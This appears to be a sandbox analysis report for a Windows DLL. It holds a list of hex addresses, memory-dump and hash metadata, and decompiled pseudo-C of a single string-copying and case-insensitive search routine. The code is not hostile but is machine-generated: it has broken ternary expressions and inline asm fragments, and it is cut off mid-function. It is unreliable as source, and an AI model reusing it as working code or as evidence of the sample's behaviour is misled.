0x6ea0bdd8
0x6ea0bdda
0x00000000
0x00000000
0x6ea0bdc3
0x6ea0bdc6
0x6ea0bdc6
0x6ea0bdc6
0x6ea0bdc9
0x6ea0bd73
0x6ea0bd76
0x6ea0bd79
0x6ea0bd7b
0x00000000
0x00000000
0x6ea0bd7d
0x6ea0bd7d
0x6ea0bd7f
0x6ea0bd7f
0x6ea0bd80
0x6ea0bd85
0x6ea0bd8a
0x6ea0bd8c
0x00000000
0x00000000
0x6ea0bd8e
0x6ea0bd92
0x6ea0bd96
0x6ea0bd98
0x00000000
0x00000000
0x00000000
0x6ea0bd98
0x00000000
0x6ea0bd7f
0x6ea0bd6d
0x6ea0bd21
0x00000000
0x6ea0bd21
0x6ea0bca3
0x6ea0bca3
0x6ea0bca6
0x6ea0bcc3
0x6ea0bccf
0x6ea0bccf
0x6ea0bcd5
0x6ea0bcd5
0x6ea0bcda
0x6ea0bcde
0x6ea0bce2
0x6ea0bce4
0x00000000
0x00000000
0x6ea0bcea
0x6ea0bced
0x6ea0bcef
0x00000000
0x00000000
0x6ea0bcf1
0x6ea0bcf7
0x6ea0bd0a
0x6ea0bd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0bcf9
0x6ea0bcf9
0x6ea0bcfd
0x6ea0bcff
0x00000000
0x00000000
0x6ea0bd01
0x6ea0bd02
0x6ea0bd08
0x00000000
0x00000000
0x00000000
0x6ea0bd08
0x00000000
0x6ea0bcf9
0x6ea0be7a
0x6ea0be7f
0x00000000
0x6ea0be7f
0x6ea0bca8
0x6ea0bcaa
0x6ea0bcad
0x00000000
0x00000000
0x6ea0bcb4
0x6ea0bcb4
0x6ea0bcb6
0x6ea0bcb6
0x6ea0bcba
0x6ea0bcbc
0x00000000
0x00000000
0x6ea0bcbe
0x6ea0bcbf
0x6ea0bcc1
0x00000000
0x00000000
0x00000000
0x6ea0bcc1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0bc55
0x6ea0bc55
0x6ea0bc59
0x6ea0bc5b
0x00000000
0x00000000
0x6ea0bc5d
0x6ea0bc5e
0x6ea0bc64
0x00000000
0x00000000
0x00000000
0x6ea0bc64
0x00000000
0x6ea0bc55
0x6ea0be86
0x6ea0be8b
0x00000000
0x6ea0be8b
0x6ea0bc01
0x6ea0bc03
0x6ea0bc09
0x00000000
0x00000000
0x6ea0bc10
0x6ea0bc10
0x6ea0bc12
0x6ea0bc12
0x6ea0bc16
0x6ea0bc18
0x00000000
0x00000000
0x6ea0bc1a
0x6ea0bc1b
0x6ea0bc1d
0x00000000
0x00000000
0x00000000
0x6ea0bc1d
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0bbe4
0x6ea0bbe4
0x6ea0bbe8
0x6ea0bbea
0x00000000
0x00000000
0x6ea0bbec
0x6ea0bbed
0x6ea0bbf3
0x00000000
0x00000000
0x00000000
0x6ea0bbf3
0x00000000
0x6ea0bbe4
0x6ea0be92
0x6ea0be97
0x00000000
0x6ea0be97
0x6ea0bb8a
0x6ea0bb8c
0x6ea0bb91
0x00000000
0x00000000
0x6ea0bb93
0x6ea0bb97
0x6ea0bb99
0x6ea0bb9d
0x6ea0bb9f
0x00000000
0x00000000
0x6ea0bba5
0x6ea0bba6
0x6ea0bba8
0x00000000
0x00000000
0x6ea0bbaa
0x00000000
0x6ea0bbaa
0x6ea0be3f
0x00000000
0x6ea0be3f
0x6ea0bb64
0x6ea0bb65
0x6ea0bb69
0x00000000
0x00000000
0x00000000
0x6ea0bb69
0x6ea0be9e
0x6ea0bea1
0x6ea0bea5
0x6ea0beab
0x6ea0beab
0x6ea0beae
0x00000000
0x00000000
0x6ea0beb8
0x6ea0beba
0x00000000
0x00000000
0x6ea0bec0
0x6ea0bec3
0x6ea0bec3
0x6ea0bec5
0x6ea0bec9
0x6ea0becd
0x6ea0bed1
0x6ea0bed1
0x6ea0bedb
0x6ea0bede
0x6ea0bee4
0x6ea0beee
0x6ea0bef1
0x6ea0bef4
0x00000000
0x00000000
0x6ea0befe
0x6ea0bf00
0x00000000
0x00000000
0x00000000
0x6ea0bf02
0x6ea0ba62
0x6ea0ba65
0x6ea0ba69
0x00000000
0x6ea0ba69
0x6ea0bf07
0x6ea0bf0b
0x6ea0be5f
0x6ea0be5f
0x6ea0be61
0x00000000
0x00000000
0x6ea0be67
0x00000000
0x00000000
0x6ea0be6d
0x6ea0be71
0x00000000
0x6ea0be71
0x6ea0ba79
0x6ea0ba7d
0x6ea0ba7f
0x6ea0ba83
0x6ea0ba87
0x6ea0ba8b
0x6ea0ba8d
0x00000000
0x00000000
0x6ea0ba93
0x6ea0ba94
0x6ea0ba96
0x00000000
0x00000000
0x6ea0ba98
0x6ea0ba9c
0x6ea0baa0
0x00000000
0x6ea0baa0
0x6ea0be53
0x6ea0be57
0x6ea0be5b
0x00000000
0x6ea0baa4
0x6ea0bab0
0x6ea0bab4
0x6ea0bab4
0x6ea0bab9
0x6ea0babd
0x6ea0bac1
0x6ea0bac1
0x6ea0bac6
0x6ea0baca
0x6ea0bace
0x6ea0bad0
0x00000000
0x00000000
0x6ea0bad6
0x6ea0bad9
0x6ea0badb
0x00000000
0x00000000
0x6ea0badd
0x6ea0bae1
0x6ea0bae5
0x6ea0bae9
0x6ea0baee
0x00000000
0x00000000
0x00000000
0x6ea0baee
0x6ea0bf16
0x6ea0bf1b
0x6ea0bf1f
0x6ea0bf21
0x6ea0bf25
0x00000000
0x6ea0bf25
0x6ea0ba6d
0x00000000
0x6ea0b8d2
0x6ea0b861
0x6ea0b864
0x6ea0b867
0x6ea0b869
0x00000000
0x00000000
0x6ea0b86b
0x6ea0b86e
0x6ea0b86e
0x6ea0b870
0x6ea0b870
0x6ea0b871
0x6ea0b876
0x6ea0b87b
0x6ea0b87d
0x00000000
0x00000000
0x6ea0b87f
0x6ea0b883
0x6ea0b887
0x6ea0b889
0x00000000
0x00000000
0x00000000
0x6ea0b889
0x6ea0b88b
0x00000000
0x6ea0b88b
0x6ea0b85b
0x6ea0b811
0x00000000
0x6ea0b811
0x6ea0b783
0x6ea0b783
0x6ea0b786
0x6ea0b7a6
0x6ea0b7aa
0x6ea0b7b6
0x6ea0b7b6
0x6ea0b7bc
0x6ea0b7bc
0x6ea0b7c1
0x6ea0b7c5
0x6ea0b7c9
0x6ea0b7cb
0x00000000
0x00000000
0x6ea0b7d1
0x6ea0b7d4
0x6ea0b7d6
0x00000000
0x00000000
0x6ea0b7d8
0x6ea0b7de
0x6ea0b7f5
0x6ea0b7f5
0x6ea0b7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b7e0
0x6ea0b7e0
0x6ea0b7e4
0x6ea0b7e6
0x00000000
0x00000000
0x6ea0b7ec
0x6ea0b7ed
0x6ea0b7f3
0x00000000
0x00000000
0x00000000
0x6ea0b7f3
0x6ea0ba15
0x6ea0ba15
0x6ea0ba18
0x6ea0ba28
0x6ea0ba1a
0x6ea0ba1c
0x6ea0ba1f
0x6ea0ba1f
0x00000000
0x6ea0ba18
0x6ea0bf2e
0x6ea0bf33
0x00000000
0x6ea0bf33
0x6ea0b788
0x6ea0b78a
0x6ea0b78c
0x00000000
0x00000000
0x6ea0b793
0x6ea0b793
0x6ea0b795
0x6ea0b795
0x6ea0b799
0x6ea0b79b
0x00000000
0x00000000
0x6ea0b7a1
0x6ea0b7a2
0x6ea0b7a4
0x00000000
0x00000000
0x00000000
0x6ea0b7a4
0x00000000
0x6ea0b795
0x6ea0b770
0x00000000
0x6ea0b770
0x6ea0b721
0x6ea0b74a
0x6ea0b74a
0x6ea0b74c
0x6ea0b74d
0x6ea0b752
0x00000000
0x6ea0b752
0x6ea0b723
0x6ea0b726
0x6ea0b72b
0x00000000
0x00000000
0x6ea0b72f
0x6ea0b72f
0x6ea0b730
0x6ea0b735
0x6ea0b73c
0x00000000
0x00000000
0x6ea0b73e
0x6ea0b742
0x6ea0b748
0x00000000
0x00000000
0x00000000
0x6ea0b748
0x00000000

Strings

@, xrefs: 6EA0B760

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: 8027013612a4b046406ad51947ba9941750a07fd09c3c6b53ba387221d2fb33b
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 59322775A047138BD354CFAAD59022A72E2BFD5758F18872DE8A58739CEB34CC85C389

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EA0A660(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed short** _t227;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				unsigned int _t242;
				signed int _t248;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				unsigned int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t312;
				unsigned int _t318;
				signed int _t319;
				signed int _t321;
				signed short* _t323;
				signed int _t324;
				signed int _t325;
				unsigned int _t326;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed short* _t344;
				signed int _t345;
				signed short* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t362;
				unsigned int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				signed int* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t432;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				void* _t447;

				_t312 = __ecx;
				_t296 = 0;
				_v40 = 0;
				_t398 = __ecx;
				_v36 = 0;
				_push(0x80);
				_t417 = E6EA01030();
				_t447 = (_t444 & 0xfffffff0) - 0x34 + 4;
				_t344 = _v40;
				if(_t344 == 0) {
					 *_t417 = 0;
					L8:
					_v36 = 0x40;
					_v40 = _t417;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t417;
						if(_t417 == 0) {
							_t418 = 0x40;
							_t345 = _t296;
							L23:
							_t24 = _t345 + 2; // 0x80000001
							_t219 = _t24;
							__eflags = _t219 - 0x40;
							_t220 =  <=  ? 0x40 : _t219;
							__eflags = _t418 - _t220;
							if(_t418 < _t220) {
								_t318 = (_t220 >> 5 >> 0x1a) + _t220 >> 6;
								_t221 = _t220 & 0x8000003f;
								__eflags = _t221;
								if(_t221 < 0) {
									_t221 = (_t221 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t221;
								}
								__eflags = _t221;
								_t319 = _t318 + (_t296 & 0xffffff00 | _t221 > 0x00000000);
								_v64 = _t319 << 6;
								_push(_t319 << 7);
								_v60 = _t345;
								_t224 = E6EA01030();
								_t345 = _v60;
								_t421 = _t224;
								_t447 = _t447 + 4;
								_t321 = _v40;
								__eflags = _t321;
								if(_t321 == 0) {
									 *_t421 = _t296;
									goto L36;
								} else {
									__eflags = _t421;
									if(_t421 == 0) {
										L34:
										_push(2);
										_push(_t321);
										_v60 = _t345;
										E6EA010B0();
										_t345 = _v60;
										_t447 = _t447 + 8;
										L36:
										_v36 = _v64;
										_v40 = _t421;
										L37:
										 *((short*)(_t421 + _t345 * 2)) = _a8 & 0x0000ffff;
										_t227 =  &_v40;
										 *( *_t227 + 2 + _t345 * 2) = _t296;
										L38:
										_t346 =  *_t227;
										_t422 = _a4;
										if(_t346 == 0) {
											L40:
											_push(0x80);
											 *_t422 = _t296;
											_t422[1] = _t296;
											_t399 = E6EA01030();
											_t447 = _t447 + 4;
											_t323 =  *_t422;
											if(_t323 == 0) {
												 *_t399 = _t296;
												L62:
												 *_t422 = _t399;
												_t422[1] = 0x40;
												L63:
												_push(2);
												_push(_v40);
												E6EA010B0();
												_v40 = _t296;
												_v36 = _t296;
												return _t422;
											}
											if(_t399 == 0) {
												L46:
												_push(2);
												_push(_t323);
												E6EA010B0();
												_t447 = _t447 + 8;
												goto L62;
											}
											_t347 =  *_t323 & 0x0000ffff;
											 *_t399 = _t347;
											if(_t347 == 0) {
												goto L46;
											}
											_t348 = _t296;
											while(1) {
												_t348 = _t348 + 1;
												_t232 =  *(_t323 + _t348 * 4 - 2) & 0x0000ffff;
												 *(_t399 + _t348 * 4 - 2) = _t232;
												if(_t232 == 0) {
													goto L46;
												}
												_t233 =  *(_t323 + _t348 * 4) & 0x0000ffff;
												 *(_t399 + _t348 * 4) = _t233;
												if(_t233 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t234 =  *_t346 & 0x0000ffff;
										if(_t234 != 0) {
											_t324 =  *_t398;
											__eflags = _t324;
											if(_t324 == 0) {
												L54:
												_push(0x80);
												 *_t422 = _t296;
												_t422[1] = _t296;
												_t399 = E6EA01030();
												_t447 = _t447 + 4;
												_t325 =  *_t422;
												__eflags = _t325;
												if(_t325 == 0) {
													 *_t399 = _t296;
													goto L62;
												}
												__eflags = _t399;
												if(_t399 == 0) {
													L60:
													_push(2);
													_push(_t325);
													E6EA010B0();
													_t447 = _t447 + 8;
													goto L62;
												}
												_t349 =  *_t325 & 0x0000ffff;
												 *_t399 = _t349;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L60;
												}
												_t350 = _t296;
												while(1) {
													_t350 = _t350 + 1;
													_t237 =  *(_t325 + _t350 * 4 - 2) & 0x0000ffff;
													 *(_t399 + _t350 * 4 - 2) = _t237;
													__eflags = _t237;
													if(_t237 == 0) {
														goto L60;
													}
													_t238 =  *(_t325 + _t350 * 4) & 0x0000ffff;
													 *(_t399 + _t350 * 4) = _t238;
													__eflags = _t238;
													if(_t238 != 0) {
														continue;
													}
													goto L60;
												}
												goto L60;
											}
											__eflags =  *_t324 & 0x0000ffff;
											if(( *_t324 & 0x0000ffff) == 0) {
												goto L54;
											}
											_v32 = _t346;
											__eflags = _t234 - 0x41 - 0x19;
											_t239 =  <=  ? _t234 + 0x20 : _t234;
											_t403 = _t296;
											_t240 = ( <=  ? _t234 + 0x20 : _t234) & 0x0000ffff;
											_v48 = _t240;
											while(1) {
												_t425 =  *(_t324 + _t403 * 2) & 0x0000ffff;
												__eflags = _t425 - 0x41 - 0x19;
												_t426 =  <=  ? _t425 + 0x20 : _t425;
												__eflags = ( <=  ? _t425 + 0x20 : _t425) - _t240;
												if(( <=  ? _t425 + 0x20 : _t425) == _t240) {
													break;
												}
												_t403 = _t403 + 1;
												__eflags =  *(_t324 + _t403 * 2) & 0x0000ffff;
												if(( *(_t324 + _t403 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												L53:
												_t422 = _a4;
												_t296 = 0;
												__eflags = 0;
												goto L54;
											}
											_t352 = _v32;
											_t404 = _t324 + _t403 * 2;
											_t422 = _a4;
											_t296 = 0;
											__eflags = _t404;
											if(_t404 == 0) {
												goto L54;
											}
											_t428 = _t352 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_v64 = _t428;
											_t242 = _t428 & 0x00000001;
											_v52 = _t242;
											_v56 =  ~_t428 + 0x10 >> 1;
											_v60 = _t324;
											_v32 = _t352;
											_t432 = _v64;
											_t299 = _v56;
											_t326 = _t242;
											while(1) {
												L70:
												_t353 = _t432;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L76;
												}
												_t251 = 0;
												__eflags = _t326;
												if(_t326 != 0) {
													L80:
													_t333 = _v32;
													while(1) {
														__eflags =  *(_t333 + _t251 * 2) & 0x0000ffff;
														if(( *(_t333 + _t251 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t251 = _t251 + 1;
														__eflags = _t251 - 0x7fffffff;
														if(_t251 < 0x7fffffff) {
															continue;
														}
														_v32 = _t333;
														L84:
														_t251 = 0x7fffffff;
														L85:
														_v68 = _t251;
														_t354 = 0;
														__eflags = 0;
														while(1) {
															_t302 =  *(_t404 + _t354 * 2) & 0x0000ffff;
															_t434 =  *(_v32 + _t354 * 2) & 0x0000ffff;
															__eflags = _t302 - 0x61 - 0x19;
															_t303 =  <=  ? _t302 - 0x20 : _t302;
															_t253 = ( <=  ? _t302 - 0x20 : _t302) & 0x0000ffff;
															__eflags = _t434 - 0x61 - 0x19;
															_t435 =  <=  ? _t434 - 0x20 : _t434;
															__eflags = _t253 - ( <=  ? _t434 - 0x20 : _t434);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t253;
															if(_t253 == 0) {
																L90:
																_t335 = _v60;
																_t296 = 0;
																_t422 = _a4;
																__eflags = _t404;
																if(_t404 == 0) {
																	goto L54;
																}
																_t406 = _t404 - _t335;
																__eflags = _t406;
																_t407 = _t406 >> 1;
																if(_t406 != 0) {
																	_t257 = _t335 & 0x0000000f;
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L106:
																		_t362 =  ~( ~_t257 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t362;
																		while(1) {
																			asm("movdqu xmm1, [ecx+eax*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb ebx, xmm1");
																			__eflags = _t296;
																			if(_t296 != 0) {
																				break;
																			}
																			_t257 = _t257 + 8;
																			__eflags = _t257 - _t362;
																			if(_t257 < _t362) {
																				continue;
																			}
																			_t296 = 0;
																			__eflags = _t362 - 0x7fffffff;
																			if(_t362 >= 0x7fffffff) {
																				L112:
																				_t362 = 0x7fffffff;
																				L113:
																				_t260 = _t362 >> 0x0000001f & _t362;
																				_t365 = _t362 - _t260;
																				__eflags = _t407;
																				if(_t407 < 0) {
																					L115:
																					_t407 = _t365;
																					L116:
																					 *_t422 = _t296;
																					_t336 = _t335 + _t260 * 2;
																					_t422[1] = _t296;
																					__eflags = _t336;
																					if(_t336 == 0) {
																						L151:
																						_push(0x80);
																						_t399 = E6EA01030();
																						_t447 = _t447 + 4;
																						_t337 =  *_t422;
																						__eflags = _t337;
																						if(_t337 == 0) {
																							 *_t399 = _t296;
																							goto L62;
																						}
																						__eflags = _t399;
																						if(_t399 == 0) {
																							L157:
																							_push(2);
																							_push(_t337);
																							E6EA010B0();
																							_t447 = _t447 + 8;
																							goto L62;
																						}
																						_t366 =  *_t337 & 0x0000ffff;
																						 *_t399 = _t366;
																						__eflags = _t366;
																						if(_t366 == 0) {
																							goto L157;
																						}
																						_t367 = _t296;
																						while(1) {
																							_t367 = _t367 + 1;
																							_t263 =  *(_t337 + _t367 * 4 - 2) & 0x0000ffff;
																							 *(_t399 + _t367 * 4 - 2) = _t263;
																							__eflags = _t263;
																							if(_t263 == 0) {
																								goto L157;
																							}
																							_t264 =  *(_t337 + _t367 * 4) & 0x0000ffff;
																							 *(_t399 + _t367 * 4) = _t264;
																							__eflags = _t264;
																							if(_t264 != 0) {
																								continue;
																							}
																							goto L157;
																						}
																						goto L157;
																					}
																					__eflags =  *_t336 & 0x0000ffff;
																					if(( *_t336 & 0x0000ffff) == 0) {
																						goto L151;
																					}
																					__eflags = _t407;
																					if(_t407 != 0) {
																						L131:
																						_t159 = _t407 + 1; // 0x80000000
																						_t369 = _t159;
																						__eflags = _t369 - 0x40;
																						_t370 =  <=  ? 0x40 : _t369;
																						__eflags = _t370;
																						if(_t370 > 0) {
																							_t270 = (_t370 >> 5 >> 0x1a) + _t370 >> 6;
																							_t371 = _t370 & 0x8000003f;
																							__eflags = _t371;
																							if(_t371 < 0) {
																								_t371 = (_t371 - 0x00000001 | 0xffffffc0) + 1;
																								__eflags = _t371;
																							}
																							__eflags = _t371;
																							_t271 = _t270 + (_t296 & 0xffffff00 | _t371 > 0x00000000);
																							_v64 = _t271 << 6;
																							_push(_t271 << 7);
																							_v60 = _t336;
																							_t273 = E6EA01030();
																							_t336 = _v60;
																							_t447 = _t447 + 4;
																							_t376 =  *_t422;
																							__eflags = _t376;
																							if(_t376 == 0) {
																								 *_t273 = _t296;
																								goto L143;
																							} else {
																								__eflags = _t273;
																								if(_t273 == 0) {
																									L141:
																									_push(2);
																									_push(_t376);
																									_v68 = _t273;
																									_v60 = _t336;
																									E6EA010B0();
																									_t336 = _v60;
																									_t273 = _v68;
																									_t447 = _t447 + 8;
																									L143:
																									_t422[1] = _v64;
																									 *_t422 = _t273;
																									L144:
																									__eflags = _t273;
																									if(_t273 == 0) {
																										goto L63;
																									}
																									_t378 = _t296;
																									while(1) {
																										_t309 =  *_t336 & 0x0000ffff;
																										_t378 = _t378 + 1;
																										 *_t273 = _t309;
																										__eflags = _t407;
																										if(_t407 == 0) {
																											goto L149;
																										}
																										__eflags = _t378 - _t407;
																										if(_t378 == _t407) {
																											_t296 = 0;
																											 *(_t273 + 2) = 0;
																											goto L63;
																										}
																										L149:
																										__eflags = _t309;
																										if(_t309 == 0) {
																											_t296 = 0;
																											goto L63;
																										}
																										_t273 = _t273 + 2;
																										_t336 = _t336 + 2;
																										__eflags = _t336;
																									}
																								}
																								_t438 =  *_t376 & 0x0000ffff;
																								 *_t273 = _t438;
																								__eflags = _t438;
																								_t422 = _a4;
																								if(_t438 == 0) {
																									goto L141;
																								} else {
																									goto L138;
																								}
																								while(1) {
																									L138:
																									_t296 = _t296 + 1;
																									_t439 =  *(_t376 + _t296 * 4 - 2) & 0x0000ffff;
																									 *(_t273 + _t296 * 4 - 2) = _t439;
																									__eflags = _t439;
																									if(_t439 == 0) {
																										break;
																									}
																									_t440 =  *(_t376 + _t296 * 4) & 0x0000ffff;
																									 *(_t273 + _t296 * 4) = _t440;
																									__eflags = _t440;
																									if(_t440 != 0) {
																										continue;
																									}
																									break;
																								}
																								_t422 = _a4;
																								_t296 = 0;
																								__eflags = 0;
																								goto L141;
																							}
																						}
																						_t273 = _t296;
																						goto L144;
																					}
																					_t382 = _t336 & 0x0000000f;
																					__eflags = _t382;
																					if(_t382 == 0) {
																						L124:
																						_t407 =  ~( ~_t382 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t407;
																						while(1) {
																							asm("movdqu xmm1, [ecx+edx*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb eax, xmm1");
																							__eflags = _t260;
																							if(_t260 != 0) {
																								break;
																							}
																							_t382 = _t382 + 8;
																							__eflags = _t382 - _t407;
																							if(_t382 < _t407) {
																								continue;
																							}
																							__eflags = _t407 - 0x7fffffff;
																							if(_t407 >= 0x7fffffff) {
																								L130:
																								_t407 = 0x7fffffff;
																								goto L131;
																							} else {
																								goto L128;
																							}
																							while(1) {
																								L128:
																								__eflags =  *(_t336 + _t407 * 2) & 0x0000ffff;
																								if(( *(_t336 + _t407 * 2) & 0x0000ffff) == 0) {
																									goto L131;
																								}
																								_t407 = _t407 + 1;
																								__eflags = _t407 - 0x7fffffff;
																								if(_t407 < 0x7fffffff) {
																									continue;
																								}
																								goto L130;
																							}
																							goto L131;
																						}
																						asm("bsf edi, eax");
																						_t407 = (_t407 >> 1) + _t382;
																						goto L131;
																					}
																					_t407 = _t296;
																					__eflags = _t382 & 0x00000001;
																					if((_t382 & 0x00000001) != 0) {
																						goto L128;
																					}
																					_t382 =  ~_t382 + 0x10 >> 1;
																					__eflags = _t382;
																					while(1) {
																						_t260 =  *(_t336 + _t407 * 2) & 0x0000ffff;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							goto L131;
																						}
																						_t407 = _t407 + 1;
																						__eflags = _t407 - _t382;
																						if(_t407 < _t382) {
																							continue;
																						}
																						goto L124;
																					}
																					goto L131;
																				}
																				__eflags = _t407 - _t365;
																				if(_t407 <= _t365) {
																					goto L116;
																				}
																				goto L115;
																			} else {
																				goto L110;
																			}
																			while(1) {
																				L110:
																				__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																				if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																					goto L113;
																				}
																				_t362 = _t362 + 1;
																				__eflags = _t362 - 0x7fffffff;
																				if(_t362 < 0x7fffffff) {
																					continue;
																				}
																				goto L112;
																			}
																			goto L113;
																		}
																		_t363 = _t296;
																		_t296 = 0;
																		asm("bsf edx, edx");
																		_t362 = (_t363 >> 1) + _t257;
																		goto L113;
																	}
																	_t362 = 0;
																	__eflags = _t257 & 0x00000001;
																	if((_t257 & 0x00000001) != 0) {
																		goto L110;
																	}
																	_t257 =  ~_t257 + 0x10 >> 1;
																	__eflags = _t257;
																	while(1) {
																		__eflags =  *(_t335 + _t362 * 2) & 0x0000ffff;
																		if(( *(_t335 + _t362 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t362 = _t362 + 1;
																		__eflags = _t362 - _t257;
																		if(_t362 < _t257) {
																			continue;
																		}
																		_t296 = 0;
																		__eflags = 0;
																		goto L106;
																	}
																	_t296 = 0;
																	goto L113;
																}
																_push(0x80);
																 *_t422 = 0;
																_t422[1] = 0;
																_t399 = E6EA01030();
																_t447 = _t447 + 4;
																_t338 =  *_t422;
																__eflags = _t338;
																if(_t338 == 0) {
																	 *_t399 = 0;
																	goto L62;
																}
																__eflags = _t399;
																if(_t399 == 0) {
																	L98:
																	_push(2);
																	_push(_t338);
																	E6EA010B0();
																	_t447 = _t447 + 8;
																	goto L62;
																}
																_t386 =  *_t338 & 0x0000ffff;
																 *_t399 = _t386;
																__eflags = _t386;
																if(_t386 == 0) {
																	goto L98;
																}
																_t387 = 0;
																while(1) {
																	_t387 = _t387 + 1;
																	_t280 =  *(_t338 + _t387 * 4 - 2) & 0x0000ffff;
																	 *(_t399 + _t387 * 4 - 2) = _t280;
																	__eflags = _t280;
																	if(_t280 == 0) {
																		goto L98;
																	}
																	_t281 =  *(_t338 + _t387 * 4) & 0x0000ffff;
																	 *(_t399 + _t387 * 4) = _t281;
																	__eflags = _t281;
																	if(_t281 != 0) {
																		continue;
																	}
																	goto L98;
																}
																goto L98;
															}
															_t354 = _t354 + 1;
															__eflags = _t354 - _v68;
															if(_t354 < _v68) {
																continue;
															}
															goto L90;
														}
														_t356 = _t404 + 2;
														__eflags = _t356;
														if(_t356 == 0) {
															goto L53;
														}
														__eflags =  *(_t404 + 2) & 0x0000ffff;
														if(( *(_t404 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v44 = _t404;
														_t255 = 0;
														__eflags = 0;
														while(1) {
															_t255 = _t255 + 1;
															_t404 = _v44 + _t255 * 2;
															_t331 =  *_t404 & 0x0000ffff;
															__eflags = ( *(_t356 + _t255 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t332 =  <=  ? _t331 + 0x20 : _t331;
															__eflags = ( <=  ? _t331 + 0x20 : _t331) - _v48;
															if(( <=  ? _t331 + 0x20 : _t331) == _v48) {
																break;
															}
															__eflags =  *(_t356 + _t255 * 2) & 0x0000ffff;
															if(( *(_t356 + _t255 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t432 = _v64;
														_t299 = _v56;
														_t326 = _v52;
														goto L70;
													}
													_v32 = _t333;
													L163:
													__eflags = _t251;
													if(__eflags == 0) {
														goto L84;
													}
													if(__eflags > 0) {
														goto L85;
													}
													goto L90;
												}
												_t441 = _v32;
												_t353 = _t299;
												while(1) {
													__eflags =  *(_t441 + _t251 * 2) & 0x0000ffff;
													if(( *(_t441 + _t251 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t251 = _t251 + 1;
													__eflags = _t251 - _t299;
													if(_t251 < _t299) {
														continue;
													}
													_v32 = _t441;
													_t326 = _v52;
													goto L76;
												}
												_v32 = _t441;
												goto L163;
												L76:
												_t300 = _v32;
												_t248 =  ~( ~_t353 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t248;
												while(1) {
													asm("movdqu xmm1, [ebx+edx*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb ecx, xmm1");
													__eflags = _t326;
													if(_t326 != 0) {
														break;
													}
													_t353 = _t353 + 8;
													__eflags = _t353 - _t248;
													if(_t353 < _t248) {
														continue;
													}
													_v32 = _t300;
													__eflags = _t248 - 0x7fffffff;
													if(_t248 >= 0x7fffffff) {
														goto L84;
													}
													goto L80;
												}
												asm("bsf eax, eax");
												_v32 = _t300;
												_t251 = (_t326 >> 1) + _t353;
												goto L163;
											}
										}
										goto L40;
									}
									_t283 =  *_t321 & 0x0000ffff;
									 *_t421 = _t283;
									__eflags = _t283;
									if(_t283 == 0) {
										goto L34;
									}
